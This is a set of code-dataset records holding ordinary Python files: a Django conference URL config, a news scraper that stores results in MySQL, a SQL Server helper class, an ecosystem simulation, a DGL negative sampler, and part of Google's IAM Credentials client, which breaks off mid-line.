+{"seq_id":"198800401","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\nfrom django.contrib import admin\n\nimport symposion.views\nfrom pinaxcon import views\nfrom pinaxcon.attendees import views as attendee_views\n\nurlpatterns = [\n url(r\"^$\", TemplateView.as_view(template_name=\"homepage.html\"), name=\"home\"),\n url(r\"^agenda/$\", TemplateView.as_view(template_name=\"agenda.html\"), name=\"agenda\"),\n url(r\"^becas/$\", views.becas, name=\"becas\"),\n url(r\"^schedule.json$\", views.schedule_json, name=\"schedule_json\"),\n url(r\"^process-acreditation\", views.process_acreditation,\n name=\"process_acreditation\"),\n url(r\"^diversidad/$\", TemplateView.as_view(template_name=\"declaracion_diversidad.html\"), name=\"diversidad\"),\n url(r\"^codigo-conducta/$\", TemplateView.as_view(template_name=\"codigo_conducta.html\"), name=\"codigo-de-conducta\"),\n url(r\"^forma-parte/$\", TemplateView.as_view(template_name=\"forma_parte.html\"), name=\"forma-parte\"),\n url(r\"^alojamiento/$\", TemplateView.as_view(template_name=\"alojamiento.html\"), name=\"alojamiento\"),\n url(r\"^organizadores/$\", TemplateView.as_view(template_name=\"organizadores.html\"), name=\"organizadores\"),\n url(r\"^sponsors/$\", TemplateView.as_view(template_name=\"sponsors.html\"), name=\"sponsors\"),\n url(r\"^admin/\", include(admin.site.urls)),\n\n url(r\"^account/\", include(\"account.urls\")),\n\n url(r\"^dashboard/\", symposion.views.dashboard, name=\"dashboard\"),\n\n url(r\"^speaker/\", include(\"symposion.speakers.urls\")),\n url(r\"^proposals/\", include(\"symposion.proposals.urls\")),\n url(r\"^sponsors/\", include(\"symposion.sponsorship.urls\")),\n url(r\"^reviews/\", include(\"symposion.reviews.urls\")),\n url(r\"^schedule/\", include(\"symposion.schedule.urls\")),\n url(r\"^attendee/\", include(\"pinaxcon.attendees.urls\")),\n url(r\"^teams/\", include(\"symposion.teams.urls\")),\n\n url(r\"^boxes/\", include(\"pinax.boxes.urls\")),\n url(r'^captcha/', include('captcha.urls')),\n url(r\"^\", include(\"pinax.pages.urls\")),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"pinaxcon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"235284022","text":"# -*-coding:utf-8-*-\nimport urllib.request\nfrom lxml import etree\nimport re\nimport datetime\nimport random\nimport pymysql.cursors\n\naaa = \"123\"\n# 创建链接(connect to the database)\nconn = pymysql.connect(host='localhost',\n port=3306,\n # unix_socket='/tmp/mysql.sock',\n user='root',\n passwd=\" \",\n db='FTTT',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\nurl='http://www.ftchinese.com/channel/chinareport.html?page=2'\n\ndef store(title, content):\n with conn.cursor() as cursor:\n sql = \"INSERT INTO `政经` (`title`, `content`) VALUES (%s,%s)\"\n cursor.execute(sql, (title, content))\n cursor.connection.commit()\n print(\"in store\")\n\ntry:\n for k in range(1, 4):\n new_link = re.sub('page=\\d+', 'page=%d' % k, url, re.S)\n response = urllib.request.urlopen(new_link)\n html = response.read()\n page = etree.HTML(html)\n print(k)\n print(new_link)\n title_ = page.xpath('//h2[@class=\"item-headline\"]/a')\n content_ = page.xpath('//div[@class=\"item-lead\"]')\n time = page.xpath('//div[@class=\"item-time\"]')\n\n j = len(title_)\n for i in range(0, j):\n print(title_[i].text)\n print(content_[i].text)\n print(time[i].text)\n store(title_[i].text,content_[i].text)\n # store('sspk', \"dd\")\n\n with conn.cursor() as cursor:\n # Create a new record\n sql = \"INSERT INTO `政经` (`title`, `content`) VALUES (%s,%s)\"\n cursor.execute(sql, ('', 'very-secret'))\n # connection is not autocommit by default. So you must commit to save\n # your changes.\n conn.commit()\n\n with conn.cursor() as cursor:\n # Read a single record\n sql = \"SELECT `title`, `content` FROM `政经` WHERE `title`=%s\"\n cursor.execute(sql, ('webmaster@python.org',))\n result = cursor.fetchone()\n print(result)\n\nfinally:\n conn.close()\n# # 创建游标\n# cur = conn.cursor()\n# # 执行SQL,并返回受影响行数\n# cur.execute(\"USE scraping\")\n# #random.seed(datetime.datetime.now())\n#\n\n\n\n#\n# cur.execute(\"SELECT * FROM pages WHERE id=1\")\n# print(cur.fetchone())\n# cur.close()\n# conn.close()\n# def getLinks(articleUrl):\n\n\n\n\n\n","sub_path":"FT/政经标题/title2.py","file_name":"title2.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"529633737","text":"\n\n# conn = pymssql.connect(host='localhost',\n# user='sa',\n# password='1',\n# database='test',\n# charset='utf8')\n# #查看连接是否成功\n# cursor = conn.cursor()\n# sql = 'select * from user'\n# cursor.execute(sql)\n# #用一个rs变量获取数据\n# rs = cursor.fetchall()\n#\n# print(rs)\n\n# -*- coding:utf-8 -*-\n\nimport pymssql\n\nclass MSSQL:\n def __init__(self,host,user,pwd,db):\n self.host = host\n self.user = user\n self.pwd = pwd\n self.db = db\n\n def __GetConnect(self):\n if not self.db:\n raise(NameError,\"没有设置数据库信息\")\n self.conn = pymssql.connect(host=self.host,user=self.user,password=self.pwd,database=self.db,charset=\"utf8\")\n cur = self.conn.cursor()\n if not cur:\n raise(NameError,\"连接数据库失败\")\n else:\n return cur\n\n def ExecQuery(self,sql):\n cur = self.__GetConnect()\n cur.execute(sql)\n resList = cur.fetchall()\n\n #查询完毕后必须关闭连接\n self.conn.close()\n return resList\n\n def ExecNonQuery(self,sql):\n cur = self.__GetConnect()\n cur.execute(sql)\n self.conn.commit()\n self.conn.close()\n\n# ms = MSSQL(host=\"123.57.28.87\",user=\"sa\",pwd=\"1\",db=\"nzkh\")\n# reslist = ms.ExecQuery(\"select * from tb_User\")\n\nms = MSSQL(host=\"127.0.0.1\",user=\"sa\",pwd=\"1\",db=\"test\")\nreslist = ms.ExecQuery(\"select * from user\")\nfor i in reslist:\n print(i)\n\n# newsql=\"update webuser set name='%s' where =1\"%u'测试'\n# print(newsql)\n# ms.ExecNonQuery(newsql.encode('utf-8'))","sub_path":"conn_sqlserver.py","file_name":"conn_sqlserver.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"635357724","text":"import mapa as mp\nimport cell\nimport event\nimport cap as cp\nimport obsrand\nimport map_constructor as mc\nfrom random import uniform\n\n\ndef foto(m, n):\n\t\"\"\"\n\tDado um mapa m, devolve uma fotografia do sistema.\n\t\"\"\"\n\tlst = [(i, j) for j in range(len(m)) for i in range(len(m))]\n\tft = []\n\tfor i in range(n):\n\t\tft.append([(c, cell.getLevel(cell.getCell(m, c), i)) for c in lst])\n\n\treturn ft\n\n\ndef sim(N=4, dim=10, Qinit=[25, 20, 15, 10], Init=\"ran\", Tmax=30, Tmud=1, Tloc=1,\n\t\tRmig=0.8, Prain=0.01, Qwat=0.01, Dry=0.8, Nfotos=200):\n\n\t# Construir o mapa (usando oásis, ou randomMap)\n\tif Init == \"ran\":\n\t\tm = mc.randomMap(dim, N, Qinit)\n\telse:\n\t\tm = mc.oasis(dim, N)\n\n\t# Tempo médio por foto.\n\tTfot = Tmax/Nfotos\n\tfList = []\n\n\tcap = cp.newC()\n\tcurrent_event = event.evt(0, \"fot\")\n\tcurrent_time = event.time(current_event)\n\tcurrent_kind = event.kind(current_event)\n\tcurrent_cell = event.cell(current_event)\n\tcurrent_level = event.level(current_event)\n\n\t# Establecer a estação atual e adicionar a próxima mudança à CAP.\n\test = \"hum\"\n\tcap = cp.addE(cap, event.evt(current_time+obsrand.exprandom(Tmud), \"est\"))\n\n\t# Adicionar um evento por cada célula e para cada nível trófico à CAP.\n\tfor n in range(1, N+1):\n\t\tfor i in range(1,dim+1):\n\t\t\tfor j in range(1,dim+1):\n\t\t\t\tcap = cp.addE(cap, event.evt(current_time+obsrand.exprandom(Tloc), \"loc\", (i, j), n))\n\n\t# While Loop até o tempo atual ser maior ou igual a Tmax.\n\twhile current_time <= Tmax:\n\n\t\t# Se o evento for \"ft\": tirar uma fotografia e escrever no ficheiro\n\t\t# e adicionar a próxima fotografia à CAP (tempo local + tempo entre fotos (Tmax/Nfotos))\n\t\tif current_kind == \"fot\":\n\t\t\tfList.append(foto(m, N))\n\t\t\tcap = cp.addE(cap, event.evt(\n\t\t\t\tcurrent_time+Tfot, \"fot\"))\n\t\t\tprint(\"foto\")\n\n\t\t# Se o evento for \"est\": mudar de estação e adicionar o próximo evento deste tipo à CAP.\n\t\telif current_kind == \"est\":\n\t\t\tif est == \"hum\":\n\t\t\t\test = \"sec\"\n\t\t\telse:\n\t\t\t\test = \"hum\"\n\t\t\tprint(est, current_time)\n\t\t\tcap = cp.addE(cap, event.evt(current_time+obsrand.exprandom(Tmud), \"est\"))\n\n\t\t# Se um evento for \"loc\": mudar as coisas nessa célula e adicionar o próximo \"loc\" à CAP.\n\t\telif current_kind == \"loc\":\n\t\t\tcoor = event.cell(current_event)\n\t\t\tquad = cell.getCell(m, coor)\n\t\t\tlvl = event.level(current_event)\n\n\t\t\tif lvl == 1:\n\t\t\t\tq_0 = cell.getLevel(quad, 1)\n\t\t\t\ta_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), 1)\n\t\t\t\tk_2 = 0\n\n\t\t\t\tfor n in range(3, N+1):\n\t\t\t\t\tk_2 += cell.quantLevel(m, mp.viz(coor, 2, dim), n)\n\t\t\t\t\n\t\t\t\tif a_2 == 0:\n\t\t\t\t\tt_cs = -1\n\t\t\t\telse:\n\t\t\t\t\tr = k_2/(2*a_2)\n\t\t\t\t\tif r < 1:\n\t\t\t\t\t\tt_cs = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tt_cs = 1 - min(2, r)\n\n\t\t\t\tif est == \"hum\":\n\t\t\t\t\tq_ch = uniform(0.9*Qwat, min(1, 1.1*Qwat))\n\t\t\t\telse:\n\t\t\t\t\tq_ch = -Dry*q_0\n\n\t\t\t\tq = q_ch + q_0*(1 + t_cs)\n\n\t\t\t\tif q < 0.01:\n\t\t\t\t\tq = 0\n\n\t\t\t\tcell.changeCell(m, coor, 1, q)\n\n\t\t\telif lvl > 1:\n\t\t\t\tif cell.quantLevel(m, mp.viz(coor, 1, dim), lvl) == 0:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\t# Calcular f_w\n\t\t\t\t\ta_m = cell.quantLevel(m, mp.viz(coor, lvl, dim), 1)\n\t\t\t\t\tt_m = 0\n\t\t\t\t\tfor n in range(2, N+1):\n\t\t\t\t\t\tt_m += cell.quantLevel(m, mp.viz(coor, lvl, dim), n)\n\t\t\t\t\tr_w = a_m/t_m\n\n\t\t\t\t\tif r_w < 1:\n\t\t\t\t\t\tf_w = r_w - 1\n\t\t\t\t\telif 1 < r_w:\n\t\t\t\t\t\tf_w = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_w = max(1, r-2)\n\n\t\t\t\t\t# Calcular f_a\n\t\t\t\t\tc_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl-1)\n\t\t\t\t\ti_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl)\n\n\t\t\t\t\tr_a = c_2/i_2\n\n\t\t\t\t\tif r_a < 1:\n\t\t\t\t\t\tf_a = r_a - 1\n\t\t\t\t\telif 1 < r_a:\n\t\t\t\t\t\tf_a = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_a = max(1, r-2)\n\n\t\t\t\t\t# Calcular f_p\n\t\t\t\t\tif lvl == N:\n\t\t\t\t\t\tp_2 = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tp_2 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl-1)\n\n\t\t\t\t\tr_p = p_2/2*i_2\n\n\t\t\t\t\tif r_p < 1:\n\t\t\t\t\t\tf_p = -(r_p - 1)\n\t\t\t\t\telif 1 < r_p:\n\t\t\t\t\t\tf_p = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_p = -max(1, r-2)\n\n\t\t\t\t\tf = (f_w + f_a + f_p - max(f_w, f_a, f_p))/2\n\n\t\t\t\t\tif f < 0:\n\t\t\t\t\t\tt = uniform(0, 1+f)\n\t\t\t\t\telif f == 0:\n\t\t\t\t\t\tt = uniform(0.9, 1.1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tt = uniform(1, 1+f)\n\n\t\t\t\t\tq_0 = cell.getLevel(quad, n)\n\n\t\t\t\t\tif q_0 == 0 and f > 0:\n\t\t\t\t\t\tQ_0 = cell.quantLevel(m, mp.viz(coor, 2, dim), lvl)\n\n\t\t\t\t\t\tq = (Q_0*Rmig*t)/4\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tq = q_0*t\n\n\t\t\t\t\t\tif q < 0.01:\n\t\t\t\t\t\t\tq = 0\n\n\t\t\t\t\tcell.changeCell(m, coor, lvl, q)\n\n\t\t\tcap = cp.addE(cap, event.evt(\n\t\t\t\tobsrand.exprandom(Tloc), \"loc\", coor, lvl))\n\n\t\tcap = cp.delE(cap)\n\t\tcurrent_event = cp.nextE(cap)\n\t\tcurrent_time = event.time(current_event)\n\t\tcurrent_kind = event.kind(current_event)\n\t\tcurrent_cell = event.cell(current_event)\n\t\tcurrent_level = event.level(current_event)\n\n\t# Escrever as coisas no ficheiro.\n\n\twith open('resultados.txt', 'w') as f:\n\t\tf.write(str(dim) + '\\n')\n\t\tf.write(str(N) + '\\n')\n\t\tfor line in fList:\n\t\t\tf.write(str(line)+'\\n')\n\n\nsim(Tmax = 5)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"442250049","text":"\"\"\"Negative samplers.\"\"\"\n\nfrom _collections_abc import Mapping\n\nimport torch\nfrom torchdata.datapipes.iter import Mapper\n\nfrom .data_format import LinkPredictionEdgeFormat\n\n\nclass NegativeSampler(Mapper):\n \"\"\"\n A negative sampler used to generate negative samples and return\n a mix of positive and negative samples.\n \"\"\"\n\n def __init__(\n self,\n datapipe,\n negative_ratio,\n output_format,\n ):\n \"\"\"\n Initlization for a negative sampler.\n\n Parameters\n ----------\n datapipe : DataPipe\n The datapipe.\n negative_ratio : int\n The proportion of negative samples to positive samples.\n output_format : LinkPredictionEdgeFormat\n Determines the edge format of the output data.\n \"\"\"\n super().__init__(datapipe, self._sample)\n assert negative_ratio > 0, \"Negative_ratio should be positive Integer.\"\n self.negative_ratio = negative_ratio\n self.output_format = output_format\n\n def _sample(self, data):\n \"\"\"\n Generate a mix of positive and negative samples.\n\n Parameters\n ----------\n data : LinkPredictionBlock\n An instance of 'LinkPredictionBlock' class requires the 'node_pair'\n field. This function is responsible for generating negative edges\n corresponding to the positive edges defined by the 'node_pair'. In\n cases where negative edges already exist, this function will\n overwrite them.\n\n Returns\n -------\n LinkPredictionBlock\n An instance of 'LinkPredictionBlock' encompasses both positive and\n negative samples.\n \"\"\"\n node_pairs = data.node_pair\n if isinstance(node_pairs, Mapping):\n if self.output_format == LinkPredictionEdgeFormat.INDEPENDENT:\n data.label = {}\n else:\n data.negative_head, data.negative_tail = {}, {}\n for etype, pos_pairs in node_pairs.items():\n self._collate(\n data, self._sample_with_etype(pos_pairs, etype), etype\n )\n if self.output_format == LinkPredictionEdgeFormat.HEAD_CONDITIONED:\n data.negative_tail = None\n if self.output_format == LinkPredictionEdgeFormat.TAIL_CONDITIONED:\n data.negative_head = None\n else:\n self._collate(data, self._sample_with_etype(node_pairs))\n return data\n\n def _sample_with_etype(self, node_pairs, etype=None):\n \"\"\"Generate negative pairs for a given etype form positive pairs\n for a given etype.\n\n Parameters\n ----------\n node_pairs : Tuple[Tensor, Tensor]\n A tuple of tensors that represent source-destination node pairs of\n positive edges, where positive means the edge must exist in the\n graph.\n etype : str\n Canonical edge type.\n\n Returns\n -------\n Tuple[Tensor, Tensor]\n A collection of negative node pairs.\n \"\"\"\n raise NotImplementedError\n\n def _collate(self, data, neg_pairs, etype=None):\n \"\"\"Collates positive and negative samples into data.\n\n Parameters\n ----------\n data : LinkPredictionBlock\n The input data, which contains positive node pairs, will be filled\n with negative information in this function.\n neg_pairs : Tuple[Tensor, Tensor]\n A tuple of tensors represents source-destination node pairs of\n negative edges, where negative means the edge may not exist in\n the graph.\n etype : str\n Canonical edge type.\n \"\"\"\n pos_src, pos_dst = (\n data.node_pair[etype] if etype is not None else data.node_pair\n )\n neg_src, neg_dst = neg_pairs\n if self.output_format == LinkPredictionEdgeFormat.INDEPENDENT:\n pos_label = torch.ones_like(pos_src)\n neg_label = torch.zeros_like(neg_src)\n src = torch.cat([pos_src, neg_src])\n dst = torch.cat([pos_dst, neg_dst])\n label = torch.cat([pos_label, neg_label])\n if etype is not None:\n data.node_pair[etype] = (src, dst)\n data.label[etype] = label\n else:\n data.node_pair = (src, dst)\n data.label = label\n else:\n if self.output_format == LinkPredictionEdgeFormat.CONDITIONED:\n neg_src = neg_src.view(-1, self.negative_ratio)\n neg_dst = neg_dst.view(-1, self.negative_ratio)\n elif (\n self.output_format == LinkPredictionEdgeFormat.HEAD_CONDITIONED\n ):\n neg_src = neg_src.view(-1, self.negative_ratio)\n neg_dst = None\n elif (\n self.output_format == LinkPredictionEdgeFormat.TAIL_CONDITIONED\n ):\n neg_dst = neg_dst.view(-1, self.negative_ratio)\n neg_src = None\n else:\n raise TypeError(\n f\"Unsupported output format {self.output_format}.\"\n )\n if etype is not None:\n data.negative_head[etype] = neg_src\n data.negative_tail[etype] = neg_dst\n else:\n data.negative_head = neg_src\n data.negative_tail = neg_dst\n","sub_path":"python/dgl/graphbolt/negative_sampler.py","file_name":"negative_sampler.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"311721584","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Accesses the google.iam.credentials.v1 IAMCredentials API.\"\"\"\n\nimport pkg_resources\nimport warnings\n\nfrom google.oauth2 import service_account\nimport google.api_core.client_options\nimport google.api_core.gapic_v1.client_info\nimport google.api_core.gapic_v1.config\nimport google.api_core.gapic_v1.method\nimport google.api_core.gapic_v1.routing_header\nimport google.api_core.grpc_helpers\nimport google.api_core.path_template\nimport grpc\n\nfrom google.cloud.iam_credentials_v1.gapic import iam_credentials_client_config\nfrom google.cloud.iam_credentials_v1.gapic.transports import (\n iam_credentials_grpc_transport,\n)\nfrom google.cloud.iam_credentials_v1.proto import common_pb2\nfrom google.cloud.iam_credentials_v1.proto import iamcredentials_pb2_grpc\nfrom google.protobuf import duration_pb2\n\n\n_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(\"google-cloud-iam\").version\n\n\nclass IAMCredentialsClient(object):\n \"\"\"\n A service account is a special type of Google account that belongs to your\n application or a virtual machine (VM), instead of to an individual end user.\n Your application assumes the identity of the service account to call Google\n APIs, so that the users aren't directly involved.\n\n Service account credentials are used to temporarily assume the identity\n of the service account. Supported credential types include OAuth 2.0 access\n tokens, OpenID Connect ID tokens, self-signed JSON Web Tokens (JWTs), and\n more.\n \"\"\"\n\n SERVICE_ADDRESS = \"iamcredentials.googleapis.com:443\"\n \"\"\"The default address of the service.\"\"\"\n\n # The name of the interface for this client. This is the key used to\n # find the method configuration in the client_config dictionary.\n _INTERFACE_NAME = \"google.iam.credentials.v1.IAMCredentials\"\n\n @classmethod\n def from_service_account_file(cls, filename, *args, **kwargs):\n \"\"\"Creates an instance of this client using the provided credentials\n file.\n\n Args:\n filename (str): The path to the service account private key json\n file.\n args: Additional arguments to pass to the constructor.\n kwargs: Additional arguments to pass to the constructor.\n\n Returns:\n IAMCredentialsClient: The constructed client.\n \"\"\"\n credentials = service_account.Credentials.from_service_account_file(filename)\n kwargs[\"credentials\"] = credentials\n return cls(*args, **kwargs)\n\n from_service_account_json = from_service_account_file\n\n @classmethod\n def service_account_path(cls, project, service_account):\n \"\"\"Return a fully-qualified service_account string.\"\"\"\n return google.api_core.path_template.expand(\n \"projects/{project}/serviceAccounts/{service_account}\",\n project=project,\n service_account=service_account,\n )\n\n def __init__(\n self,\n transport=None,\n channel=None,\n credentials=None,\n client_config=None,\n client_info=None,\n client_options=None,\n ):\n \"\"\"Constructor.\n\n Args:\n transport (Union[~.IamCredentialsGrpcTransport,\n Callable[[~.Credentials, type], ~.IamCredentialsGrpcTransport]): A transport\n instance, responsible for actually making the API calls.\n The default transport uses the gRPC protocol.\n This argument may also be a callable which returns a\n transport instance. Callables will be sent the credentials\n as the first argument and the default transport class as\n the second argument.\n channel (grpc.Channel): DEPRECATED. A ``Channel`` instance\n through which to make calls. This argument is mutually exclusive\n with ``credentials``; providing both will raise an exception.\n credentials (google.auth.credentials.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n This argument is mutually exclusive with providing a\n transport instance to ``transport``; doing so will raise\n an exception.\n client_config (dict): DEPRECATED. A dictionary of call options for\n each method. If not specified, the default configuration is used.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n client_options (Union[dict, google.api_core.client_options.ClientOptions]):\n Client options used to set user options on the client. API Endpoint\n should be set through client_options.\n \"\"\"\n # Raise deprecation warnings for things we want to go away.\n if client_config is not None:\n warnings.warn(\n \"The `client_config` argument is deprecated.\",\n PendingDeprecationWarning,\n stacklevel=2,\n )\n else:\n client_config = iam_credentials_client_config.config\n\n if channel:\n warnings.warn(\n \"The `channel` argument is deprecated; use \" \"`transport` instead.\",\n PendingDeprecationWarning,\n stacklevel=2,\n )\n\n api_endpoint = self.SERVICE_ADDRESS\n if client_options:\n if type(client_options) == dict:\n client_options = google.api_core.client_options.from_dict(\n client_options\n )\n if client_options.api_endpoint:\n api_endpoint = client_options.api_endpoint\n\n # Instantiate the transport.\n # The transport is responsible for handling serialization and\n # deserialization and actually sending data to the service.\n if transport:\n if callable(transport):\n self.transport = transport(\n credentials=credentials,\n default_class=iam_credentials_grpc_transport.IamCredentialsGrpcTransport,\n address=api_endpoint,\n )\n else:\n if credentials:\n raise ValueError(\n \"Received both a transport instance and \"\n \"credentials; these are mutually exclusive.\"\n )\n self.transport = transport\n else:\n self.transport = iam_credentials_grpc_transport.IamCredentialsGrpcTransport(\n address=api_endpoint, channel=channel, credentials=credentials\n )\n\n if client_info is None:\n client_info = google.api_core.gapic_v1.client_info.ClientInfo(\n gapic_version=_GAPIC_LIBRARY_VERSION\n )\n else:\n client_info.gapic_version = _GAPIC_LIBRARY_VERSION\n self._client_info = client_info\n\n # Parse out the default settings for retry and timeout for each RPC\n # from the client configuration.\n # (Ordinarily, these are the defaults specified in the `*_config.py`\n # file next to this one.)\n self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(\n client_config[\"interfaces\"][self._INTERFACE_NAME]\n )\n\n # Save a dictionary of cached API call functions.\n # These are the actual callables which invoke the proper\n # transport methods, wrapped with `wrap_method` to add retry,\n # timeout, and the like.\n self._inner_api_calls = {}\n\n # Service calls\n def generate_access_token(\n self,\n name,\n scope,\n delegates=None,\n lifetime=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Generates an OAuth 2.0 access token for a service account.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `scope`:\n >>> scope = []\n >>>\n >>> response = client.generate_access_token(name, scope)\n\n Args:\n name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n scope (list[str]): Required. Code to identify the scopes to be included in the OAuth 2.0 access token.\n See https://developers.google.com/identity/protocols/googlescopes for more\n information.\n At least one value required.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n lifetime (Union[dict, ~google.cloud.iam_credentials_v1.types.Duration]): The desired lifetime duration of the access token in seconds.\n Must be set to a value less than or equal to 3600 (1 hour). If a value is\n not specified, the token's lifetime will be set to a default value of one\n hour.\n\n If a dict is provided, it must be of the same form as the protobuf\n message :class:`~google.cloud.iam_credentials_v1.types.Duration`\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.GenerateAccessTokenResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"generate_access_token\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"generate_access_token\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.generate_access_token,\n default_retry=self._method_configs[\"GenerateAccessToken\"].retry,\n default_timeout=self._method_configs[\"GenerateAccessToken\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.GenerateAccessTokenRequest(\n name=name, scope=scope, delegates=delegates, lifetime=lifetime\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"generate_access_token\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n\n def generate_id_token(\n self,\n name,\n audience,\n delegates=None,\n include_email=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Generates an OpenID Connect ID token for a service account.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `audience`:\n >>> audience = ''\n >>>\n >>> response = client.generate_id_token(name, audience)\n\n Args:\n name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n audience (str): Required. The audience for the token, such as the API or account that this token\n grants access to.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n include_email (bool): Include the service account email in the token. If set to ``true``, the\n token will contain ``email`` and ``email_verified`` claims.\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.GenerateIdTokenResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"generate_id_token\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"generate_id_token\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.generate_id_token,\n default_retry=self._method_configs[\"GenerateIdToken\"].retry,\n default_timeout=self._method_configs[\"GenerateIdToken\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.GenerateIdTokenRequest(\n name=name,\n audience=audience,\n delegates=delegates,\n include_email=include_email,\n )\n if metadata is None:\n metadata = []\n metadata = 